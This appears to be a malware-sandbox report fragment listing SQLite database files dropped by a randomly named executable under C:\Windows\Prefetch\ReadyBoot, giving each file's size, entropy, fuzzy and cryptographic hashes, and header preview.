                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.6732424250451717
                                                            Encrypted:false
                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.8439810553697228
                                                            Encrypted:false
                                                            SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                            MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                            SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                            SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                            SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5707520969659783
                                                            Encrypted:false
                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5712781801655107
                                                            Encrypted:false
                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.6732424250451717
                                                            Encrypted:false
                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5712781801655107
                                                            Encrypted:false
                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5712781801655107
                                                            Encrypted:false
                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.8439810553697228
                                                            Encrypted:false
                                                            SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                            MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                            SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                            SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                            SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5707520969659783
                                                            Encrypted:false
                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5707520969659783
                                                            Encrypted:false
                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
